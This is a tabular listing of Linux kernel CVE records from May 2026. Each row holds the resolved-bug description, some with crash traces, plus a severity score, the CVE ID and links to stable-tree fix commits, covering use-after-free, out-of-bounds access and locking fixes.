| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: Clear reconnect pending bit When canceling the reconnect worker, care must be taken to reset the reconnect-pending bit. If the reconnect worker has not yet been scheduled before it is canceled, the reconnect-pending bit will stay on forever. | 2026-05-06 | 7.5 | CVE-2026-43230 | https://git.kernel.org/stable/c/3cf001aff71b1db1b4732a5381b012a114720664 https://git.kernel.org/stable/c/60b347333ec259ac7352f62cbbc365b04c065ff8 https://git.kernel.org/stable/c/597c46a42930c963f448720aaf5001dd4ed98af4 https://git.kernel.org/stable/c/391200c274e90c34071b909ba12e3390b81b767f https://git.kernel.org/stable/c/ba2e3472022f44baddf000621fed150d7a599ea3 https://git.kernel.org/stable/c/14eae5564053ac3973b9369dc674638f22f4765e https://git.kernel.org/stable/c/bcf034fa5f66b6a3e787f765a917934a2045cf7a https://git.kernel.org/stable/c/b89fc7c2523b2b0750d91840f4e52521270d70ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/atmel-hlcdc: fix use-after-free of drm_crtc_commit after release The atmel_hlcdc_plane_atomic_duplicate_state() callback was copying the atmel_hlcdc_plane state structure without properly duplicating the drm_plane_state. In particular, state->commit remained set to the old state commit, which can lead to a use-after-free in the next drm_atomic_commit() call. Fix this by calling __drm_atomic_helper_duplicate_plane_state(), which correctly clones the base drm_plane_state (including the ->commit pointer). It has been seen when closing and re-opening the device node while another DRM client (e.g. fbdev) is still attached: ============================================================================= BUG kmalloc-64 (Not tainted): Poison overwritten ----------------------------------------------------------------------------- 0xc611b344-0xc611b344 @offset=836. First byte 0x6a instead of 0x6b FIX kmalloc-64: Restoring Poison 0xc611b344-0xc611b344=0x6b Allocated in drm_atomic_helper_setup_commit+0x1e8/0x7bc age=178 cpu=0 pid=29 drm_atomic_helper_setup_commit+0x1e8/0x7bc drm_atomic_helper_commit+0x3c/0x15c drm_atomic_commit+0xc0/0xf4 drm_framebuffer_remove+0x4cc/0x5a8 drm_mode_rmfb_work_fn+0x6c/0x80 process_one_work+0x12c/0x2cc worker_thread+0x2a8/0x400 kthread+0xc0/0xdc ret_from_fork+0x14/0x28 Freed in drm_atomic_helper_commit_hw_done+0x100/0x150 age=8 cpu=0 pid=169 drm_atomic_helper_commit_hw_done+0x100/0x150 drm_atomic_helper_commit_tail+0x64/0x8c commit_tail+0x168/0x18c drm_atomic_helper_commit+0x138/0x15c drm_atomic_commit+0xc0/0xf4 drm_atomic_helper_set_config+0x84/0xb8 drm_mode_setcrtc+0x32c/0x810 drm_ioctl+0x20c/0x488 sys_ioctl+0x14c/0xc20 ret_fast_syscall+0x0/0x54 Slab 0xef8bc360 objects=21 used=16 fp=0xc611b7c0 flags=0x200(workingset|zone=0) Object 0xc611b340 @offset=832 fp=0xc611b7c0 | 2026-05-06 | 7.8 | CVE-2026-43236 | https://git.kernel.org/stable/c/fd4a4d0711f48a99b25bcd45e00eef8339eff82d https://git.kernel.org/stable/c/6404898af86d986db1dbbe06177c143e40652e49 https://git.kernel.org/stable/c/796e77c14c4c1e2cd36473760fb6cc66c695eb47 https://git.kernel.org/stable/c/ac2d898da5095d46bd1ff8585fdd753d58ad91e7 https://git.kernel.org/stable/c/a205740a7231e967ac77cb731171642901c327af https://git.kernel.org/stable/c/7b4d0fab3ff2c00c6d34e1952c9df5129a826aee https://git.kernel.org/stable/c/549c6db503dbb85dbff4840830971853feac6625 https://git.kernel.org/stable/c/bc847787233277a337788568e90a6ee1557595eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4 This commit simplifies the amdgpu_gem_va_ioctl function, key updates include: - Moved the logic for managing the last update fence directly into amdgpu_gem_va_update_vm. - Introduced checks for the timeline point to enable conditional replacement or addition of fences. v2: Addressed review comments from Christian. v3: Updated comments (Christian). v4: The previous version selected the fence too early and did not manage its reference correctly, which could lead to stale or freed fences being used. This resulted in refcount underflows and could crash when updating GPU timelines. The fence is now chosen only after the VA mapping work is completed, and its reference is taken safely. After exporting it to the VM timeline syncobj, the driver always drops its local fence reference, ensuring balanced refcounting and avoiding use-after-free on dma_fence. Crash signature: [ 205.828135] refcount_t: underflow; use-after-free. [ 205.832963] WARNING: CPU: 30 PID: 7274 at lib/refcount.c:28 refcount_warn_saturate+0xbe/0x110 ... [ 206.074014] Call Trace: [ 206.076488] <TASK> [ 206.078608] amdgpu_gem_va_ioctl+0x6ea/0x740 [amdgpu] [ 206.084040] ? __pfx_amdgpu_gem_va_ioctl+0x10/0x10 [amdgpu] [ 206.089994] drm_ioctl_kernel+0x86/0xe0 [drm] [ 206.094415] drm_ioctl+0x26e/0x520 [drm] [ 206.098424] ? __pfx_amdgpu_gem_va_ioctl+0x10/0x10 [amdgpu] [ 206.104402] amdgpu_drm_ioctl+0x4b/0x80 [amdgpu] [ 206.109387] __x64_sys_ioctl+0x96/0xe0 [ 206.113156] do_syscall_64+0x66/0x2d0 ... [ 206.553351] BUG: unable to handle page fault for address: ffffffffc0dfde90 ... [ 206.553378] RIP: 0010:dma_fence_signal_timestamp_locked+0x39/0xe0 ... [ 206.553405] Call Trace: [ 206.553409] <IRQ> [ 206.553415] ? __pfx_drm_sched_fence_free_rcu+0x10/0x10 [gpu_sched] [ 206.553424] dma_fence_signal+0x30/0x60 [ 206.553427] drm_sched_job_done.isra.0+0x123/0x150 [gpu_sched] [ 206.553434] dma_fence_signal_timestamp_locked+0x6e/0xe0 [ 206.553437] dma_fence_signal+0x30/0x60 [ 206.553441] amdgpu_fence_process+0xd8/0x150 [amdgpu] [ 206.553854] sdma_v4_0_process_trap_irq+0x97/0xb0 [amdgpu] [ 206.554353] edac_mce_amd(E) ee1004(E) [ 206.554270] amdgpu_irq_dispatch+0x150/0x230 [amdgpu] [ 206.554702] amdgpu_ih_process+0x6a/0x180 [amdgpu] [ 206.555101] amdgpu_irq_handler+0x23/0x60 [amdgpu] [ 206.555500] __handle_irq_event_percpu+0x4a/0x1c0 [ 206.555506] handle_irq_event+0x38/0x80 [ 206.555509] handle_edge_irq+0x92/0x1e0 [ 206.555513] __common_interrupt+0x3e/0xb0 [ 206.555519] common_interrupt+0x80/0xa0 [ 206.555525] </IRQ> [ 206.555527] <TASK> ... [ 206.555650] RIP: 0010:dma_fence_signal_timestamp_locked+0x39/0xe0 ... [ 206.555667] Kernel panic - not syncing: Fatal exception in interrupt | 2026-05-06 | 7.8 | CVE-2026-43237 | https://git.kernel.org/stable/c/e9e477d3197f7d8955a042c0d7f53f78f13218ba https://git.kernel.org/stable/c/0399b8416ecf64ef86ad23401fe23eabdb07831a https://git.kernel.org/stable/c/bd8150a1b3370a9f7761c5814202a3fe5a79f44f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs: ->d_compare() must not block ... so don't use __getname() there. Switch it (and ntfs_d_hash(), while we are at it) to kmalloc(PATH_MAX, GFP_NOWAIT). Yes, ntfs_d_hash() almost certainly can do with smaller allocations, but let ntfs folks deal with that - keep the allocation size as-is for now. Stop abusing names_cachep in ntfs, period - various uses of that thing in there have nothing to do with pathnames; just use k[mz]alloc() and be done with that. For now let's keep sizes as-is, but AFAICS none of the users actually want PATH_MAX. | 2026-05-06 | 7.5 | CVE-2026-43245 | https://git.kernel.org/stable/c/142c444a395f4d26055c8a4473e228bb86283f1e https://git.kernel.org/stable/c/fb4b1f969ba01fa1d4088467a02fc1e5f0806710 https://git.kernel.org/stable/c/ca2a04e84af79596e5cd9cfe697d5122ec39c8ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost: move vdpa group bound check to vhost_vdpa Remove duplication by consolidating these here. This reduces the possibility of a parent driver missing them. While we're at it, fix a bug in vdpa_sim where a valid ASID can be assigned to a group equal to ngroups, causing an out-of-bounds write. | 2026-05-06 | 7.8 | CVE-2026-43248 | https://git.kernel.org/stable/c/ddb57354634b6ba851b79da45f1de42c646f27d0 https://git.kernel.org/stable/c/7441d35d14d9a3d66d925d90cb73c75394e6d454 https://git.kernel.org/stable/c/406db68f9cb976a8ddfafd631197264f2307e9c9 https://git.kernel.org/stable/c/cd025c1e876b4e262e71398236a1550486a73ede |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: move wait_on_sem() out of spinlock With iommu.strict=1, the existing completion wait path can cause soft lockups under a stressed environment, as wait_on_sem() busy-waits under the spinlock with interrupts disabled. Move the completion wait in iommu_completion_wait() out of the spinlock. wait_on_sem() only polls the hardware-updated cmd_sem and does not require iommu->lock, so holding the lock during the busy wait unnecessarily increases contention and extends the time with interrupts disabled. | 2026-05-06 | 7.5 | CVE-2026-43253 | https://git.kernel.org/stable/c/f2f65b28d802a667119147444ec2ae33eebf9a58 https://git.kernel.org/stable/c/715c263119fd1b918a9fcbd8a36ea5b604a46324 https://git.kernel.org/stable/c/e15768e68820142077bbca402d8e902f64ade1b0 https://git.kernel.org/stable/c/496269d12072ecb219826485bdbec70c92a8eef5 https://git.kernel.org/stable/c/d2a0cac10597068567d336e85fa3cbdbe8ca62bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: tcp - fix packet extraction from stream When processing TCP stream data in ovpn_tcp_recv, we receive large cloned skbs from __strp_rcv that may contain multiple coalesced packets. The current implementation has two bugs: 1. Header offset overflow: Using pskb_pull with large offsets on coalesced skbs causes skb->data - skb->head to exceed the u16 storage of skb->network_header. This causes skb_reset_network_header to fail on the inner decapsulated packet, resulting in packet drops. 2. Unaligned protocol headers: Extracting packets from arbitrary positions within the coalesced TCP stream provides no alignment guarantees for the packet data causing performance penalties on architectures without efficient unaligned access. Additionally, openvpn's 2-byte length prefix on TCP packets causes the subsequent 4-byte opcode and packet ID fields to be inherently misaligned. Fix both issues by allocating a new skb for each openvpn packet and using skb_copy_bits to extract only the packet content into the new buffer, skipping the 2-byte length prefix. Also, check the length before invoking the function that performs the allocation to avoid creating an invalid skb. If the packet has to be forwarded to userspace the 2-byte prefix can be pushed to the head safely, without misalignment. As a side effect, this approach also avoids the expensive linearization that pskb_pull triggers on cloned skbs with page fragments. In testing, this resulted in TCP throughput improvements of up to 74%. | 2026-05-06 | 7.5 | CVE-2026-43254 | https://git.kernel.org/stable/c/0315bec883c67fa1413c61e504a28dc5bd02eb37 https://git.kernel.org/stable/c/7dba6cd7fb168d7615194a631c9c100c1c224131 https://git.kernel.org/stable/c/d4f687fbbce45b5e88438e89b5e26c0c15847992 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: qcom: camss: vfe: Fix out-of-bounds access in vfe_isr_reg_update() vfe_isr() iterates using MSM_VFE_IMAGE_MASTERS_NUM(7) as the loop bound and passes the index to vfe_isr_reg_update(). However, vfe->line[] array is defined with VFE_LINE_NUM_MAX(4): struct vfe_line line[VFE_LINE_NUM_MAX]; When index is 4, 5, 6, the access to vfe->line[line_id] exceeds the array bounds, resulting in out-of-bounds memory access. Fix this by using separate loops for output lines and write masters. | 2026-05-06 | 7.8 | CVE-2026-43256 | https://git.kernel.org/stable/c/e6cbf765686fb6c1d8f2530b3daf6c66efc92f5d https://git.kernel.org/stable/c/0c074e80921fd18984b75836730d76c768c84f65 https://git.kernel.org/stable/c/1b103307df6d461a0731be25aca69ad0335b0933 https://git.kernel.org/stable/c/fade67c88870f497a13ed450ba01f7236c92dd9b https://git.kernel.org/stable/c/e7a38ecda2498e7ce998793ac2a46ca47317635d https://git.kernel.org/stable/c/d965919af524e68cb2ab1a685872050ad2ee933d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: alpha: fix user-space corruption during memory compaction Alpha systems can suffer sporadic user-space crashes and heap corruption when memory compaction is enabled. Symptoms include SIGSEGV, glibc allocator failures (e.g. "unaligned tcache chunk"), and compiler internal errors. The failures disappear when compaction is disabled or when using global TLB invalidation. The root cause is insufficient TLB shootdown during page migration. Alpha relies on ASN-based MM context rollover for instruction cache coherency, but this alone is not sufficient to prevent stale data or instruction translations from surviving migration. Fix this by introducing a migration-specific helper that combines: - MM context invalidation (ASN rollover), - immediate per-CPU TLB invalidation (TBI), - synchronous cross-CPU shootdown when required. The helper is used only by migration/compaction paths to avoid changing global TLB semantics. Additionally, update flush_tlb_other(), pte_clear(), to use READ_ONCE()/WRITE_ONCE() for correct SMP memory ordering. This fixes observed crashes on both UP and SMP Alpha systems. | 2026-05-06 | 7.8 | CVE-2026-43258 | https://git.kernel.org/stable/c/d4ca6ca2c6f5a1d19d9014c5b36d96637846b5d6 https://git.kernel.org/stable/c/03e42b5f7ad4c2c3db8bd384bab7990d5d53c90f https://git.kernel.org/stable/c/bab8d762a8dbb816b10011e13b87d1bca91e5f77 https://git.kernel.org/stable/c/dd5712f3379cfe760267cdd28ff957d9ab4e51c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix Null reference while testing fluster When multiple instances are created/destroyed, many interrupts happen and structures for the decoder are removed. "struct vpu_instance" is shared by all flows in the decoder, so if the structure is not protected by a lock, a NULL dereference could sometimes happen. The IRQ handler was split into two phases and a lock was added as well. | 2026-05-06 | 7.8 | CVE-2026-43263 | https://git.kernel.org/stable/c/ea316b784fe6a61b29131c98cddb24e651b1dcbc https://git.kernel.org/stable/c/d12bcf183ec7da4305d848068d15f18044eaf62a https://git.kernel.org/stable/c/e66ff2b08e4ee1c4d3b84f24818e5bcc178cc3a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: clear cloned request bio pointer when last clone bio completes Stale rq->bio values have been observed to cause double-initialization of cloned bios in request-based device-mapper targets, leading to use-after-free and double-free scenarios. One such case occurs when using dm-multipath on top of a PCIe NVMe namespace, where cloned request bios are freed during blk_complete_request(), but rq->bio is left intact. Subsequent clone teardown then attempts to free the same bios again via blk_rq_unprep_clone(). The resulting double-free path looks like: nvme_pci_complete_batch() nvme_complete_batch() blk_mq_end_request_batch() blk_complete_request() // called on a DM clone request bio_endio() // first free of all clone bios ... rq->end_io() // end_clone_request() dm_complete_request(tio->orig) dm_softirq_done() dm_done() dm_end_request() blk_rq_unprep_clone() // second free of clone bios Fix this by clearing the clone request's bio pointer when the last cloned bio completes, ensuring that later teardown paths do not attempt to free already-released bios. | 2026-05-06 | 7.8 | CVE-2026-43278 | https://git.kernel.org/stable/c/8d9ddad561136f7e6a9346767bf97b4d79e38e67 https://git.kernel.org/stable/c/7daf279c674d515fb22a727a7bbc92aeb35c5442 https://git.kernel.org/stable/c/e2e738e8dfbbf83bd2bae0467ec4420cc52da42a https://git.kernel.org/stable/c/b1c1a2637ebd675aa2d71fee8c70da8791d73850 https://git.kernel.org/stable/c/83d72091804600ead96dc9e9f518ea56cb4942f6 https://git.kernel.org/stable/c/fb8a6c18fb9a6561f7a15b58b272442b77a242dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Add sanity check for OOB writes at silencing When silencing the playback URB packets in the implicit fb mode before the actual playback, we blindly assume that the received packets fit the buffer size. But when the setup in the capture stream differs from the playback stream (e.g. due to the USB core limitation of max packet size), such an inconsistency may lead to OOB writes to the buffer, resulting in a crash. To address it, add a sanity check of the transfer buffer size at prepare_silent_urb(), and stop the data copy if the received data overflows. Also, report back the transfer error properly from there, too. Note that this doesn't fix the root cause of the playback error itself, but this merely covers the kernel Oops. | 2026-05-06 | 7.8 | CVE-2026-43279 | https://git.kernel.org/stable/c/fa01973bb79d70c4736b6a4b2de99fbb2cbc8d1f https://git.kernel.org/stable/c/780dc57794a217b49994fa1d0b42465fb10a00aa https://git.kernel.org/stable/c/8995fc0e00b3fee9bf7ecb3d836b635b730c1049 https://git.kernel.org/stable/c/fc9e5af60dc199051dc202ae78e1fe76a9977a5e https://git.kernel.org/stable/c/6af16f1b8649df4c00d6ced924bdd8b72c885b6a https://git.kernel.org/stable/c/ccaf9296763be4f76b59e2cac377006016c34435 https://git.kernel.org/stable/c/fba2105a157fffcf19825e4eea498346738c9948 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Add bounds check on pat_index to prevent OOB kernel read in madvise When a user provides a bogus pat_index value through the madvise IOCTL, the xe_pat_index_get_coh_mode() function performs an array access without validating bounds. This allows a malicious user to trigger an out-of-bounds kernel read from the xe->pat.table array. The vulnerability exists because the validation in madvise_args_are_sane() directly calls xe_pat_index_get_coh_mode(xe, args->pat_index.val) without first checking if pat_index is within [0, xe->pat.n_entries). Although xe_pat_index_get_coh_mode() has a WARN_ON to catch this in debug builds, it still performs the unsafe array access in production kernels. v2(Matthew Auld) - Using array_index_nospec() to mitigate spectre attacks when the value is used v3(Matthew Auld) - Put the declarations at the start of the block (cherry picked from commit 944a3329b05510d55c69c2ef455136e2fc02de29) | 2026-05-06 | 7.1 | CVE-2026-43280 | https://git.kernel.org/stable/c/ffba51100ff61792fefbae11ca38ac1987a818dd https://git.kernel.org/stable/c/79f52655567a6471ff3d0d6325ede91bb14461f4 https://git.kernel.org/stable/c/fbbe32618e97eff81577a01eb7d9adcd64a216d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Return queued buffers on start_streaming() failure Return buffers if streaming fails to start due to uvc_pm_get() error. This bug may be responsible for a warning I got running `while :; do yavta -c3 /dev/video0; done` on an xHCI controller which failed under this workload. I had no luck reproducing this warning again to confirm. xhci_hcd 0000:09:00.0: HC died; cleaning up usb 13-2: USB disconnect, device number 2 WARNING: CPU: 2 PID: 29386 at drivers/media/common/videobuf2/videobuf2-core.c:1803 vb2_start_streaming+0xac/0x120 | 2026-05-08 | 7.8 | CVE-2026-43290 | https://git.kernel.org/stable/c/69c32df23bed6001864779b965fa009bcd9a26de https://git.kernel.org/stable/c/a5c01f15809d1d2c319d8bfb11d071df11ab731c https://git.kernel.org/stable/c/4cf3b6fd54ebb1ebc977bdc47fb6cfcf9a471a22 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Workaround SQM/PSE stalls by disabling sticky NIX SQ manager sticky mode is known to cause stalls when multiple SQs share an SMQ and transmit concurrently. Additionally, PSE may deadlock on transitions between sticky and non-sticky transmissions. There is also a credit drop issue observed when certain condition clocks are gated. Work around these hardware errata by: - Disabling SQM sticky operation: - Clear TM6 (bit 15) - Clear TM11 (bit 14) - Disabling sticky → non-sticky transition path that can deadlock PSE: - Clear TM5 (bit 23) - Preventing credit drops by keeping the control-flow clock enabled: - Set TM9 (bit 21) These changes are applied via NIX_AF_SQM_DBG_CTL_STATUS. With this configuration the SQM/PSE maintain forward progress under load without credit loss, at the cost of disabling sticky optimizations. | 2026-05-08 | 7.5 | CVE-2026-43296 | https://git.kernel.org/stable/c/9a3fd301329474f449e75f86d8a4f6b9c603fd6c https://git.kernel.org/stable/c/d0b3c8a80336029d9356f429151eb27922d80a3c https://git.kernel.org/stable/c/36cc5a5e0178d5fb79e04173b8aa623b0108819a https://git.kernel.org/stable/c/d9b549b6951ba178ec14339a031cae65f4e43fe1 https://git.kernel.org/stable/c/cec2ceb35ce7bc874c43812bb39200d6cf691b87 https://git.kernel.org/stable/c/8052d0587fb14b85539c3a14a226586c0c3d6b4c https://git.kernel.org/stable/c/b7eba260a34e854e2487b8363c11976f082df00d https://git.kernel.org/stable/c/70e9a5760abfb6338d63994d4de6b0778ec795d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: clear page->private in free_pages_prepare() Several subsystems (slub, shmem, ttm, etc.) use page->private but don't clear it before freeing pages. When these pages are later allocated as high-order pages and split via split_page(), tail pages retain stale page->private values. This causes a use-after-free in the swap subsystem. The swap code uses page->private to track swap count continuations, assuming freshly allocated pages have page->private == 0. When stale values are present, swap_count_continued() incorrectly assumes the continuation list is valid and iterates over uninitialized page->lru containing LIST_POISON values, causing a crash: KASAN: maybe wild-memory-access in range [0xdead000000000100-0xdead000000000107] RIP: 0010:__do_sys_swapoff+0x1151/0x1860 Fix this by clearing page->private in free_pages_prepare(), ensuring all freed pages have clean state regardless of previous use. | 2026-05-08 | 7.8 | CVE-2026-43303 | https://git.kernel.org/stable/c/23b82b7a26182ad840ae67d390d7ec9771e8c00f https://git.kernel.org/stable/c/d757c793853ec5483eb41ec2942c300b8fa720fb https://git.kernel.org/stable/c/ac1ea219590c09572ed5992dc233bbf7bb70fef9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: accel: adxl380: Avoid reading more entries than present in FIFO The interrupt handler reads FIFO entries in batches of N samples, where N is the number of scan elements that have been enabled. However, the sensor fills the FIFO one sample at a time, even when more than one channel is enabled. Therefore, the number of entries reported by the FIFO status registers may not be a multiple of N; if this number is not a multiple, the number of entries read from the FIFO may exceed the number of entries actually present. To fix the above issue, round down the number of FIFO entries read from the status registers so that it is always a multiple of N. | 2026-05-08 | 7.8 | CVE-2026-43307 | https://git.kernel.org/stable/c/a40f316085985f916ba1599fc303fdbc6a078e86 https://git.kernel.org/stable/c/a8e88edfd69df7b63c882aa53e61e7c078806ad7 https://git.kernel.org/stable/c/f42ddb2945ae4ce2b6f1c2e7aae9f14455a734d3 https://git.kernel.org/stable/c/c1b14015224cfcccd5356333763f2f4f401bd810 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Properly mark live registers for indirect jumps For a `gotox rX` instruction the rX register should be marked as used in the compute_insn_live_regs() function. Fix this. | 2026-05-08 | 7.8 | CVE-2026-43321 | https://git.kernel.org/stable/c/7beae54111c34ca63357ef120e115889b915beb5 https://git.kernel.org/stable/c/d1aab1ca576c90192ba961094d51b0be6355a4d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: dummy-hcd: Fix interrupt synchronization error This fixes an error in synchronization in the dummy-hcd driver. The error has a somewhat involved history. The synchronization mechanism was introduced by commit 7dbd8f4cabd9 ("USB: dummy-hcd: Fix erroneous synchronization change"), which added an emulated "interrupts enabled" flag together with code emulating synchronize_irq() (it waits until all current handler callbacks have returned). But the emulated interrupt-disable occurred too late, after the driver containing the handler callback routines had been told that it was unbound and no more callbacks would occur. Commit 4a5d797a9f9c ("usb: gadget: dummy_hcd: fix gpf in gadget_setup") tried to fix this by moving the synchronize_irq() emulation code from dummy_stop() to dummy_pullup(), which runs before the unbind callback. There still were races, though, because the emulated interrupt-disable still occurred too late. It couldn't be moved to dummy_pullup(), because that routine can be called for reasons other than an impending unbind. Therefore commits 7dc0c55e9f30 ("USB: UDC core: Add udc_async_callbacks gadget op") and 04145a03db9d ("USB: UDC: Implement udc_async_callbacks in dummy-hcd") added an API allowing the UDC core to tell dummy-hcd exactly when emulated interrupts and their callbacks should be disabled. That brings us to the current state of things, which is still wrong because the emulated synchronize_irq() occurs before the emulated interrupt-disable! That's no good, because it means that more emulated interrupts can occur after the synchronize_irq() emulation has run, leading to the possibility that a callback handler may be running when the gadget driver is unbound. To fix this, we have to move the synchronize_irq() emulation code yet again, to the dummy_udc_async_callbacks() routine, which takes care of enabling and disabling emulated interrupt requests. The synchronization will now run immediately after emulated interrupts are disabled, which is where it belongs. | 2026-05-08 | 7.8 | CVE-2026-43324 | https://git.kernel.org/stable/c/d847f375b1bcea713143bc02720d13d2d01b012a https://git.kernel.org/stable/c/cbf7df5e5d27cd5bea92ee9a75a4b28dbcc718d4 https://git.kernel.org/stable/c/5aa776c8615bea3b1eaeec87b0788375800ead4f https://git.kernel.org/stable/c/94d4fab1dd9e64f45449bcc7d6a5acf796b13015 https://git.kernel.org/stable/c/5687a09776069bd915560021c9728ca528440128 https://git.kernel.org/stable/c/8bcd80219d8e10e660bf29b20e41bb8beb4e4cb7 https://git.kernel.org/stable/c/2ca9e46f8f1f5a297eb0ac83f79d35d5b3a02541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: flowtable: strictly check for maximum number of actions The maximum number of flowtable hardware offload actions in IPv6 is: * ethernet mangling (4 payload actions, 2 for each ethernet address) * SNAT (4 payload actions) * DNAT (4 payload actions) * Double VLAN (4 vlan actions, 2 for popping vlan, and 2 for pushing) for QinQ. * Redirect (1 action) Which makes 17, while the maximum is 16. But act_ct supports tunnel actions too. Note that payload action operates at 32-bit word level, so mangling an IPv6 address takes 4 payload actions. Update flow_action_entry_next() calls to check for the maximum number of supported actions. While at it, raise the maximum number of actions per flow from 16 to 24 so this works fine with IPv6 setups. | 2026-05-08 | 7.8 | CVE-2026-43329 | https://git.kernel.org/stable/c/ead66c77303f760f6c30be96e2e20d5a77cef614 https://git.kernel.org/stable/c/fe9018d3e94329f1951b00805a8640bc06f56ead https://git.kernel.org/stable/c/5382bb03e9c33b089d60788478b922a2dca284cc https://git.kernel.org/stable/c/57c78bd2e2dd08897acd35b2bf8bcef322e36f5e https://git.kernel.org/stable/c/504c9456699dcf4d15195ef34a0fa94a80bfc877 https://git.kernel.org/stable/c/879959a7a2be814dd57568655eafa3d8f4d0309e https://git.kernel.org/stable/c/76522fcdbc3a02b568f5d957f7e66fc194abb893 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - fix overflow on long hmac keys When a key longer than block size is supplied, it is copied and then hashed into the real key. The memory allocated for the copy needs to be rounded to DMA cache alignment, as otherwise the hashed key may corrupt neighbouring memory. The copying is performed using kmemdup, however this leads to an overflow: reading more bytes (aligned_len - keylen) from the keylen source buffer. Fix this by replacing kmemdup with kmalloc, followed by memcpy. | 2026-05-08 | 7.8 | CVE-2026-43330 | https://git.kernel.org/stable/c/31022cfde5235c45fa765f0aabeff5f0652852f2 https://git.kernel.org/stable/c/c2fb4984fe09fc176fe4c12d5e3edf626df6511d https://git.kernel.org/stable/c/aa545df011338df13f0833fc1fabcb15c0521959 https://git.kernel.org/stable/c/cebc5ebd958346195b77f42d0cd5141b4e448fae https://git.kernel.org/stable/c/80688afb9c35b3934ce2d6be9973758915e2e0ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: core: Fix thermal zone device registration error path If thermal_zone_device_register_with_trips() fails after registering a thermal zone device, it needs to wait for the tz->removal completion like thermal_zone_device_unregister(), in case user space has managed to take a reference to the thermal zone device's kobject, in which case thermal_release() may not be called by the error path itself and tz may be freed prematurely. Add the missing wait_for_completion() call to the thermal zone device registration error path. | 2026-05-08 | 7.8 | CVE-2026-43332 | https://git.kernel.org/stable/c/9e796001af97a1f7368d5114b7a8533dd98d797a https://git.kernel.org/stable/c/604da9c04c218362e1c1457304ebeb9c199d537c https://git.kernel.org/stable/c/c4c7219e93319bba9ba0765dee597784c78f63c5 https://git.kernel.org/stable/c/4d390f0e507dfb16d58f83a58d78d1150dc8b9d7 https://git.kernel.org/stable/c/9e07e3b81807edd356e1f794cffa00a428eff443 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/crypto: chacha: Zeroize permuted_state before it leaves scope Since the ChaCha permutation is invertible, the local variable 'permuted_state' is sufficient to compute the original 'state', and thus the key, even after the permutation has been done. While the kernel is quite inconsistent about zeroizing secrets on the stack (and some prominent userspace crypto libraries don't bother at all since it's not guaranteed to work anyway), the kernel does try to do it as a best practice, especially in cases involving the RNG. Thus, explicitly zeroize 'permuted_state' before it goes out of scope. | 2026-05-08 | 7.5 | CVE-2026-43336 | https://git.kernel.org/stable/c/e90ee961af515a484f091678ce58a4c3f7b73b02 https://git.kernel.org/stable/c/b416a4245f04a450c67a13e6d96056c37c5b33fe https://git.kernel.org/stable/c/bd62d9b44464a6c20a34a74068e7a784d0afa04a https://git.kernel.org/stable/c/066c760acead1fb743bae294dbd89f479ae43b9b https://git.kernel.org/stable/c/1d761e5a7340c46479fb2399598f331e4fe2c633 https://git.kernel.org/stable/c/1933249263c3a98df79992f61a566476e4163bcc https://git.kernel.org/stable/c/91999af43ca2125e3b2c18fcfc02912ada02efc3 https://git.kernel.org/stable/c/e5046823f8fa3677341b541a25af2fcb99a5b1e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: prevent possible UaF in addrconf_permanent_addr() The mentioned helper tries to warn the user about an exceptional condition, but the message is delivered too late, accessing the ipv6 after its possible deletion. Reorder the statements to avoid the possible UaF; while at it, place the warning outside the idev->lock as it needs no protection. | 2026-05-08 | 7.8 | CVE-2026-43339 | https://git.kernel.org/stable/c/eec49a33611f20336b357b3953df44f1a02049e8 https://git.kernel.org/stable/c/bacc7f31085c9820922f00bc7d79756ffa13123a https://git.kernel.org/stable/c/7bfafa1b0cd582983ebec6bb20f0a435528fe567 https://git.kernel.org/stable/c/7d9f2f4aabd116ca68fbdab5d8fb8dac74c2ea1e https://git.kernel.org/stable/c/25357b670afb5b517096da783abaa5cc4bf8359e https://git.kernel.org/stable/c/3cd4efb5df72843dfac892d0b3c7a4a8bd926b65 https://git.kernel.org/stable/c/2d88ed7fa000e19c2dc0fa31b3a849e3f5bca5c1 https://git.kernel.org/stable/c/fd63f185979b047fb22a0dfc6bd94d0cab6a6a70 |
